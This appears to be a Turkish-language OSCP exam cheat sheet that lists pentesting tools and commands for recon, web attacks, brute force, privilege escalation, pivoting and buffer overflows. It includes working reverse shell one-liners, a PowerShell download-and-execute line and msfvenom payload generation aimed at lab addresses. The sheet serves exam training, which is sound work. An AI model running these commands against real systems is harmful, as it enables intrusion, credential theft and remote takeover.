⚡ NullSecurityX OSCP Master

Full Spectrum Pentesting — 200+ Tools

Recon (25 tools) Web Exploitation (28 tools) SMB / Networks (12 tools) Active Directory (22 tools) Passwords & Cracking (18 tools) Linux PrivEsc (16 tools) Windows PrivEsc (14 tools) Pivoting (12 tools) Shells (15 tools) Buffer Overflow (10 tools) Cloud (10 tools) Forensics (8 tools) Reporting (8 tools)

OSCP Ultimate Reference Guide

🎯 200+ araç | Her komut açıklamalı | OSCP PEN-200 müfredatına tam uyum

0Tools
11Categories
500+Commands

🔍 Reconnaissance & Enumeration

25 tools

🌐 Nmap

Ağ keşfi, port tarama, servis versiyon tespiti — OSCP'nin en temel aracı
📌 Hızlı servis taraması (OSCP standart) - En yaygın kullanılan tarama
nmap -sC -sV -oA hedef_adi 10.10.10.1
🎯 Tüm portları tara - 65535 portu yüksek hızda tarar
nmap -p- --min-rate 10000 10.10.10.1
🔵 UDP servis taraması - DNS, SNMP, DHCP gibi UDP servisleri için
nmap -sU --top-ports 20 10.10.10.1
⚠️ Vuln script taraması - Bilinen zafiyetleri kontrol eder
nmap --script vuln -p 80,443,445 10.10.10.1

Rustscan

3 saniyede 65k port tarayabilen hızlı port tarayıcı
🚀 Hızlı tarama + otomatik nmap - Portları bulup hemen nmap'e verir
rustscan -a 10.10.10.1 -- -sC -sV
📡 Tüm portları tara - 65535 portu saniyeler içinde tarar
rustscan -a 10.10.10.1 -- -p- -A

📡 Masscan

İnternet çapında tarama (10 milyon paket/sn)
🌍 Geniş ağ taraması - /24 ağını hızlıca tarar
masscan -p1-10000 --rate=10000 10.10.10.0/24
🎯 Belirli portları tara - Web ve kritik servisler için
masscan -p80,443,445,3389,22,21 --rate=5000 -oJ output.json 10.10.10.1

🔍 Naabu

Go ile yazılmış hızlı port tarayıcı
🏃 Hızlı port taraması
naabu -host 10.10.10.1
✅ Doğrulama ile tüm portlar - Açık portları teyit eder
naabu -host 10.10.10.1 -p - -verify

🔎 Subfinder

Pasif subdomain keşfi (OSINT tabanlı)
🌐 Tüm kaynaklardan subdomain topla
subfinder -d hedef.com -all -o subs.txt
📁 Çoklu domain taraması
subfinder -dL domains.txt -recursive -o all_subs.txt

🗺️ Amass

Derinlemesine subdomain keşfi ve haritalama
📡 Pasif enumeration - DNS kayıtlarını sorgular
amass enum -passive -d hedef.com -o subs.txt
💪 Aktif enumeration + brute force - DNS brute force yapar
amass enum -active -brute -w wordlist.txt -d hedef.com

🏷️ Assetfinder

Basit ve hızlı subdomain bulma
🎯 Doğrudan subdomain bulma
assetfinder hedef.com

🔧 DNSx

Hızlı DNS sorgulama ve çözümleme
📋 Toplu DNS çözümleme - Subdomain listesini IP'ye çevirir
dnsx -l domains.txt -a -resp -o resolved.txt
🔄 AXFR (Zone Transfer) kontrolü
dnsx -l subs.txt -axfr -ns 10.10.10.1

📧 theHarvester

Email, subdomain, IP ve hostname toplama
🔎 Tüm kaynaklardan OSINT toplama
theHarvester -d hedef.com -b google,bing,linkedin -l 500

📋 whois

Domain kayıt bilgileri sorgulama
🏢 Domain bilgileri
whois hedef.com
📍 IP lokasyon bilgisi
whois IP_ADRESI | grep -i "orgname\|country"

🔬 Dig

DNS sorgulama aracı
🔄 Zone Transfer (AXFR) denemesi
dig AXFR @ns.hedef.com hedef.com
🔍 Tüm DNS kayıtlarını getir
dig ANY hedef.com

🦁 Fierce

DNS brute force aracı
💪 DNS brute force ile subdomain keşfi
fierce --domain hedef.com --subdomains wordlist.txt

🌍 HTTPx

Canlı HTTP/HTTPS servislerini bulma
✅ Canlı hostları bul + teknoloji tespiti
httpx -l subs.txt -title -tech-detect -status-code -o live.txt

🎯 Web Exploitation

28 tools

🚀 FFUF

Hızlı web fuzzing — OSCP'nin favori web aracı
📁 Dizin brute force - Gizli dizinleri bulur
ffuf -u http://hedef.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
🏠 Virtual Host keşfi - Farklı host header'ları dener
ffuf -u http://hedef.com -H "Host: FUZZ.hedef.com" -w subdomains.txt
🔧 Parametre fuzzing - Gizli parametreleri bulur
ffuf -u http://hedef.com/page?FUZZ=test -w params.txt
🔄 Recursive tarama - Bulunan dizinleri tekrar tarar
ffuf -u http://hedef.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3

💥 Gobuster

Dizin, DNS, VHost brute force aracı
📂 Dizin brute force - Dosya uzantılarıyla birlikte
gobuster dir -u http://hedef.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
🔍 DNS subdomain brute force
gobuster dns -d hedef.com -w subdomains.txt
🏠 Virtual Host brute force
gobuster vhost -u http://hedef.com -w vhosts.txt

🦊 Feroxbuster

Rust ile yazılmış hızlı dizin brute force
⚡ Hızlı dizin taraması - Otomatik recursion
feroxbuster -u http://hedef.com -w wordlist.txt -x php,html,txt
🔗 Link extract ile derin tarama
feroxbuster -u http://hedef.com -w wordlist.txt --extract-links

🔍 Dirsearch

Python tabanlı dizin brute force
📁 Dizin taraması - 404 hatalarını filtrele
dirsearch -u http://hedef.com -e php,html,txt -x 404

🗄️ SQLmap

SQL Injection otomasyonu — Veritabanı zafiyetlerini bulur
🗃️ Veritabanlarını listele - Mevcut DB'leri bul
sqlmap -u "http://hedef.com/page?id=1" --dbs
📋 Tablo ve veri çekme
sqlmap -u "http://hedef.com/page?id=1" -D database --tables --dump
💻 OS Shell alma - MySQL/MSSQL'de sistem komutu çalıştır
sqlmap -u "http://hedef.com" --os-shell

⚠️ Nikto

Web sunucu güvenlik tarayıcısı
🛡️ Kapsamlı güvenlik taraması
nikto -h http://hedef.com -ssl -Format html -o nikto_report.html
🎯 Özel tuning ile tarama
nikto -h http://hedef.com -Tuning 123456789

📝 WPScan

WordPress güvenlik tarayıcısı
🔍 WordPress enumeration - Plugin, tema, kullanıcı bul
wpscan --url http://hedef.com --enumerate vp,vt,u
🔑 Password brute force - Admin şifre kırma
wpscan --url http://hedef.com --passwords rockyou.txt --usernames admin

🕷️ Burp Suite

Web proxy ve zafiyet tarama (Profesyonel araç)
🌐 Proxy ayarı - Tarayıcıyı 127.0.0.1:8080'a yönlendir
# Proxy: 127.0.0.1:8080
🔁 Repeater - İstekleri tekrarla ve düzenle
# Request'leri Repeater'a gönder, parametreleri değiştir
💣 Intruder - Brute force, fuzzing, parametre testi
# Positions belirle, Payload set et, Attack başlat

🧬 Nuclei

Şablon tabanlı zafiyet tarayıcısı (2000+ template)
📋 Tüm şablonlarla tarama
nuclei -u http://hedef.com -t ~/nuclei-templates/
🎯 Kritik severity tarama
nuclei -u http://hedef.com -severity critical,high

🪟 SMB & Windows Networks

12 tools

🔌 NetExec (nxc)

SMB, LDAP, WinRM, SSH enumeration — CrackMapExec'in devamı
📂 SMB share listele - Açık paylaşımları göster
netexec smb 10.10.10.1 -u user -p pass --shares
🔓 Null session kontrolü - Kimlik doğrulamasız erişim
netexec smb 10.10.10.1 -u '' -p '' --shares
💣 Password spraying - Aynı şifre ile birden çok kullanıcı dene
netexec smb 10.10.10.1 -u users.txt -p 'Password123' --continue-on-success
💻 WinRM ile komut çalıştır - Uzaktan komut yürüt
netexec winrm 10.10.10.1 -u admin -p pass -x 'whoami'

🐧 enum4linux-ng

Windows/Linux SMB enumeration — Kapsamlı bilgi toplar
📊 Tam enum - Kullanıcı, share, grup, politika hepsi
enum4linux-ng -A 10.10.10.1
👥 Kullanıcı enumeration
enum4linux-ng -U 10.10.10.1
📁 Share enumeration
enum4linux-ng -S 10.10.10.1

🔗 smbclient

SMB share'lerine bağlanma ve dosya işlemleri
📋 Share listeleme
smbclient -L //10.10.10.1 -N
📂 Share'e bağlanma
smbclient //10.10.10.1/share -U user

🗂️ SMBMap

SMB share enumeration ve dosya işlemleri
🔍 Share listeleme + izin kontrolü
smbmap -H 10.10.10.1 -u guest -p ""
📁 Dizin içeriğini listeleme
smbmap -H 10.10.10.1 -u user -p pass -r share

🔐 Passwords & Cracking

18 tools

Hashcat

GPU ile hızlı hash kırma — Dünyanın en hızlı kırıcısı
🔢 MD5 kırma (mode 0)
hashcat -m 0 -a 0 hash.txt rockyou.txt
🪟 NTLM kırma (mode 1000) - Windows hash'leri
hashcat -m 1000 hash.txt rockyou.txt
🌐 NetNTLMv2 kırma (mode 5600) - SMB relay hash'leri
hashcat -m 5600 hash.txt rockyou.txt
👑 Kerberoast (mode 13100)
hashcat -m 13100 hash.txt rockyou.txt

🔨 John the Ripper

CPU ile hash kırma — Hashcat alternatifi
📖 Wordlist ile kırma
john --wordlist=rockyou.txt hash.txt
✨ Rules ile kırma - Daha fazla varyasyon
john --rules --wordlist=rockyou.txt hash.txt

💧 Hydra

Online brute force aracı
🔐 SSH brute force
hydra -l admin -P rockyou.txt ssh://10.10.10.1
🌐 Web login brute force (POST form)
hydra -L users.txt -P pass.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=error"

🕸️ CeWL

Web sitesinden özel wordlist oluşturma
📝 Site kelimelerinden wordlist oluştur
cewl http://hedef.com -m 6 -w custom.txt

🐧 Linux Privilege Escalation

16 tools

📌 Linux PrivEsc Vectors

SUID/SGID | Sudo misconfig | Capabilities | Cron jobs | Writable files | Kernel exploits | PATH hijacking | Docker/LXD escape | NFS root squashing | LD_PRELOAD

🐚 LinPEAS

Otomatik Linux privilege escalation enumeration
📥 İndir ve çalıştır
wget https://github.com/carlospolop/PEASS-ng/releases/download/20241215/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a

👁️ pspy

Process monitoring (cron job ve komut tespiti)
📥 İndir ve çalıştır
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -pf -i 1000

🔢 LinEnum

Klasik Linux enumeration scripti
📥 İndir ve çalıştır
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh -t

💣 Linux Exploit Suggester

Kernel exploit önerileri
📥 Kernel exploit bul
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
./linux-exploit-suggester.sh

🪟 Windows Privilege Escalation

14 tools

📌 Windows PrivEsc Vectors

Potato attacks (Juicy, Sweet, Rogue) | Unquoted service paths | Insecure service permissions | AlwaysInstallElevated | Registry autoruns | DLL hijacking | Token impersonation | Kernel exploits

🪟 WinPEAS

Otomatik Windows privilege escalation
📁 Executable versiyonu
.\winpeas.exe
📜 PowerShell ile indir ve çalıştır
iex (New-Object Net.WebClient).DownloadString('http://10.10.14.1/winpeas.ps1')

PowerUp

Misconfiguration exploitation
🔍 Tüm zafiyetleri kontrol et
Import-Module .\PowerUp.ps1; Invoke-AllChecks
⚙️ Service binary exploit - Yazılabilir servis binary'si
Install-ServiceBinary -ServiceName vuln_service

🥔 Potato Attacks

Token impersonation ile yetki yükseltme
🥔 JuicyPotato (Windows 2016 ve altı)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *
🍠 SweetPotato (Windows 2019+)
SweetPotato.exe -p whoami

🔄 Pivoting & Tunneling

12 tools

🕸️ Ligolo-ng

TUN interface ile transparent pivoting — OSCP için en iyisi
🎮 Attacker (Kali) - Proxy server başlat
sudo ip tuntap add dev ligolo mode tun
sudo ip link set ligolo up
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:9999
🖥️ Victim (Pivot noktası) - Agent bağlan
./agent -connect 10.10.14.1:9999 -ignore-cert

⛏️ Chisel

SOCKS5 proxy ile tunneling
🎮 Attacker - Server başlat
chisel server -p 8000 --reverse
🖥️ Victim - Client bağlan
chisel client 10.10.14.1:8000 R:socks

🔗 ProxyChains

SOCKS üzerinden araçları yönlendirme
⚙️ Config dosyasını düzenle
# /etc/proxychains4.conf: socks5 127.0.0.1 1080
🔍 Nmap ile iç ağ taraması
proxychains nmap -sT -Pn 10.0.1.0/24

🔐 SSH Tunneling

Local/Remote port forwarding ile tunneling
📡 Local port forwarding - Kali'den iç ağa
ssh -L 8080:target:80 user@jumpbox
📤 Remote port forwarding - İç ağdan Kali'ye
ssh -R 4444:localhost:4444 kali@10.10.14.1

🐚 Reverse Shells & Stabilization

15 tools

📡 Reverse Shell One-Liners

Hızlı shell almak için hazır komutlar
🐧 Bash reverse shell
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
🐍 Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
🪟 PowerShell reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('10.10.14.1',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb + 'PS ' + (pwd).Path + '> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$c.Close()"

🖥️ PTY Stabilization

Tam interaktif shell (tab completion, history, Ctrl+C)
🐍 Python PTY spawn
python3 -c 'import pty;pty.spawn("/bin/bash")'
⌨️ STTY stabilization (Shell aldıktan sonra CTRL+Z yap)
stty raw -echo; fg
export TERM=xterm
stty rows 50 cols 150

💥 Buffer Overflow (OSCP BoF)

10 tools

📌 OSCP BoF 7 Adım Metodolojisi

1. Fuzzing → 2. Crash Replication → 3. EIP Offset → 4. Control EIP → 5. Bad Characters → 6. Find JMP ESP → 7. Exploit + Shellcode

🧪 Mona.py

Immunity Debugger için BoF yardımcısı
⚙️ Working directory ayarla
!mona config -set workingfolder C:\logs
🎯 EIP offset bulma
!mona findmsp -distance 3000
🚫 Bad character tespiti
!mona bytearray -b "\x00\x0a\x0d"
!mona compare -f C:\logs\bytearray.bin -a ESP_address

💣 msfvenom

Shellcode ve payload oluşturma
🎯 Windows reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v shellcode

☁️ Cloud Pentesting

10 tools

☁️ AWS CLI

AWS enumeration ve exploitation
🔑 Kimlik doğrulama
aws configure
🪣 S3 bucket listeleme
aws s3 ls

🔬 Forensics & OSINT

8 tools

🏷️ ExifTool

Dosya metadata okuma
📸 Resim/Görüntü metadata
exiftool image.jpg

📦 Binwalk

Binary içinde gizli dosya analizi
🔍 Embedded dosyaları bul
binwalk -e dosya.bin

📄 OSCP Reporting

8 tools

📝 OSERT Template

whoisflynn v3.2 OSCP rapor şablonu
📥 Şablonu indir
git clone https://github.com/noraj/OSCP-Exam-Report-Template-Markdown
📄 PDF oluştur (Pandoc ile)
pandoc report.md -o OSCP-OS-XXXXX-Exam-Report.pdf --from markdown+yaml_metadata_block+raw_html --template eisvogel --table-of-contents --number-sections

📋 OSCP Sınav Metodolojisi — 7 Adım

  • 1. External Recon (OSINT)
  • 2. Port Scanning (Rustscan + Nmap)
  • 3. Service Enumeration (NetExec, enum4linux, gobuster)
  • 4. Vulnerability Research (Searchsploit, CVE DB)
  • 5. Initial Access (Exploit, brute force, web shell)
  • 6. Privilege Escalation (LinPEAS/WinPEAS + manual)
  • 7. Lateral Movement / AD (BloodHound, Impacket)

💡 OSCP İpuçları

• her zaman local.txt ve proof.txt kanıtlarını screen al ve yedekle
• Enumeration her şeydir — atlama, derinlemesine yap
• BoF için 30 dakikadan fazla harcama, takılırsan diğer makinelere geç
• Metasploit sadece 1 makine için kullan (sınırlı)
• AD setinde BloodHound ile haritayı çıkar, en kısa yolu bul
• Raporlamayı sınav anında yap, unutma